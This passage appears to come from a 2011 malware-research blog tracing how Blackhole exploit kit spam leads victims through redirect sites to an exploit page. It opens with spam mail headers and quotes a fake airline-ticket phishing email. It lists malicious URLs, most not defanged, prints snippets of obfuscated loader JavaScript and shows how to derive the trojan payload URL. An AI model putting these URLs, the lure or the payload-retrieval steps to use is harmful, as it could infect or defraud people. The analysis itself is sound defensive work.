RCVD_IN_BRBL_LASTEXT=1.449, SPF_FAIL=0.001, WEIRD_PORT=0.001]
autolearn=no
Received: from mail.erieconstruction.net (erieconstruction.net [72.240.57.234])
by mail4.emailconfig.com (Postfix) with ESMTP id 33D76398366
for <darren@it-mate.co.uk>; Thu, 8 Dec 2011 02:35:20 +0000 (GMT)
Received: from mail.alpinspire.com (mail.alpinspire.com [71.33.236.177])
(authenticated bits=0)
by mail.erieconstruction.net (8.14.4/8.14.3) with ESMTP id pB82kgOX025376
for <darren@it-mate.co.uk>; Wed, 7 Dec 2011 21:46:50 -0500
Date: Wed, 7 Dec 2011 21:46:50 -0500
Message-Id: <201112080246.pB82kgOX025376@mail.erieconstruction.net>
Content-Type: multipart/alternative; boundary="===============0038370588=="
MIME-Version: 1.0
Subject: [SPAM] Introducing the new and improved Firefox 8, optimized for
Facebook. 72.240.41.100
From: "Mozilla Firefox" <updater@pi73rjvy.firefoxx.com>
To: undisclosed-recipients:;

Monday, 5 December 2011

Blackhole exploit: For those wondering, Part 2

I received a comment to the 2009 blog. This one houses a variation of the MO used that I outlined in part 1 (was not going to be a part 2, but it's got a few changes that warranted it).

The MO in this case, is;

1. Site A
2. Exploit

There's no MITMs this time. There's also a slight change in the code used on the exploit page itself, though curiously, it's even easier to decode than the last one (only 3 lines needing commented out this time).

I've not got the headers for this one, but the e-mail apparently contains;

Dear Customer,

FLIGHT ELECTRONIC NUMBER 24-3054499
DATE & TIME / DECEMBER 12, 2011, 07:16 PM
ARRIVING AIRPORT: Chicago O'Hare International Airport
PRICE : 743.59 USD

Please download and print out your ticket here:
Download hxxp://thefire.org/reports/guides/1/tztei.htm?B9I5=Z66FITS&2Q5=5CO8CFG2ARLWIHHCFJHL0VG7G&

Jazlyn Warren,
Airlines America


4b1273d8-59cae6f0


thefire.org lives at;

IP: 64.49.244.212
IP PTR: Resolution failed
ASN: 10532 64.49.192.0/18 RACKSPACE - Rackspace Hosting
Registrar: GoDaddy

This redirects to;

czredret.ru/main.php

Which is living on Infium IP space;

IP: 188.190.99.26
IP PTR: ip-188-190-99-26.hosted-in.infiumhost.com
ASN: 197145 188.190.96.0/19 ASINFIUM Infium Ltd.

inetnum: 188.190.96.0 - 188.190.127.255
netname: INFIUM
descr: Infium LTD
country: UA
org: ORG-INFI1-RIPE
admin-c: INF20-RIPE
tech-c: INF20-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-END-MNT
mnt-lower: RIPE-NCC-END-MNT
mnt-by: NETASSIST-MNT
mnt-routes: NETASSIST-MNT
mnt-domains: NETASSIST-MNT
source: RIPE # Filtered

organisation: ORG-INFI1-RIPE
org-name: Infium Ltd.
org-type: OTHER
address: 61129, Ukraine, Kharkov, Traktorostroiteley 156/41 ave, office 200
mnt-ref: INFIUM-MNT
mnt-by: INFIUM-MNT
source: RIPE # Filtered

person: Infium Ltd
address: 61129, Kharkov, Ukraine, Traktorostroiteley 156/41, office 200
abuse-mailbox: abusemail@infiumhost.com
phone: +380577632339
phone: +1425606-33-07
nic-hdl: INF20-RIPE
mnt-by: INFIUM-MNT
source: RIPE # Filtered

:: Information related to '188.190.96.0/19AS197145'

route: 188.190.96.0/19
descr: Infium LTD
origin: AS197145
mnt-by: NETASSIST-MNT
source: RIPE # Filtered


In the case of this variation, all you need to do is comment out the following lines;

//a=(window.document.removeChild+'')['split']('')[1];
//if(a==='f'||a==='u') < this line appears twice, you'll need to comment out both


From here it's the same as the last one - locate the line containing "?f=" to get the value you'll need for the payload (in this case, /w.php?f=17).

References

Blackhole exploit: For those wondering
http://hphosts.blogspot.com/2011/12/blackhole-exploit-for-those-wondering.html

Blackhole exploit: For those wondering

For those wondering and not yet aware. The latest incarnations coming via e-mail have changed MO - the link to the exploit itself, isn't directly in the e-mail anymore. Instead, it goes via;

1. Site A
2. 4 x MITMs
5. Exploit site

In this case;

cadcamengineers.com/6ebc21/index.html
-> napaul.com/statcounters.js
-> proplastics.rs/statcounters.js
-> rodns.eu/statcounters.js
-> sashandbow.com.au/statcounters.js
--> twistloft.com/main.php?page=111d937ec38dd17e


cadcamengineers.com
    -> 75.125.218.230 - Resolution failed
    -> AS21844 75.125.0.0/16 THEPLANET-AS - ThePlanet.com Internet Services, Inc.
twistloft.com
    -> 65.254.63.228 - Resolution failed
    -> AS3595 65.254.48.0/20 GNAXNET-AS - Global Net Access, LLC
napaul.com
    -> 202.191.61.93 - hubble.websiteactive.com
    -> AS24446 202.191.60.0/22 NETREGISTRY-AS-AP NetRegsitry Pty Ltd.
proplastics.rs
    -> 217.26.70.100 - bender.verat.net
    -> AS15982 217.26.64.0/20 VERAT-AS-1 Drustvo za telekomunikacije Verat d.o.o, Bulevar Vojvode Misica 37
rodns.eu
    -> 85.9.19.61 - 61.19.9.85.clausweb.ro
    -> AS5606 85.9.0.0/18 KQRO GTS Telecom SRL
sashandbow.com.au
    -> 70.87.76.162 - vanquish.websitewelcome.com
    -> AS21844 70.84.0.0/14 THEPLANET-AS - ThePlanet.com Internet Services, Inc.


Presumably, this is an effort at redundancy, to ensure it still delivers when one of the MITMs is down.

Annoyingly, the initial script on main.php is still easy to decode, comment out the following;

bb=window['document']['getElement'+s]("html");
bb=(bb[0]+'')['substr'](2,4);
aa=bb;

if((aa==='bjec')||(aa==='ject')){

e=window['eval'];
if((aa==='bjec')||(aa==='ject'))


Change;

e(c);


To;

eval(c);


Pop it into Malzilla, and voila - it decodes itself, saving us a world of time.

Given we already know what the Blackhole exploit itself already does, you'll likely want to skip straight to the payload URL itself, in which case, locate the first line containing;

?f=


Then simply combine the number in the f var, with;

{SITE}/w.php?f=


In this case, f was 59, so the URL was;

twistloft.com/w.php?f=59


Which produced this lovely little beast (no surprises as to what it is of course);

http://www.virustotal.com/file-scan/report.html?id=f925960e9e1855dd8bdcf01d221b0c9d5c4da400f7eca946bd0818b26989c7a4-1323083117

Malwarebytes users will be pleased to know, the 180KB of badness is detected as Trojan.FakeCC.

The e-mail itself originated from 46.55.191.45 ( AS34841 BALCHIKNET Lafy EOOD - AS51582 DCC-BG Cifrova Kabelna Korporacia EOOD).

inetnum: 46.55.128.0 - 46.55.191.255
netname: DCC-BG-PLD
descr: DCC Plovdiv
country: BG
admin-c: JH6135-RIPE
tech-c: JH6135-RIPE
status: ASSIGNED PA
mnt-by: IPACCT-MNT
source: RIPE # Filtered

person: Jivko Hristev
address: 12 Bulair, str., 4230 Asenovgrad
mnt-by: IPACCT-MNT
phone: +359 894 373034
nic-hdl: JH6135-RIPE
source: RIPE # Filtered

route: 46.55.128.0/17
descr: DCC
origin: AS51582
mnt-by: IPACCT-MNT
source: RIPE # Filtered


The e-mail;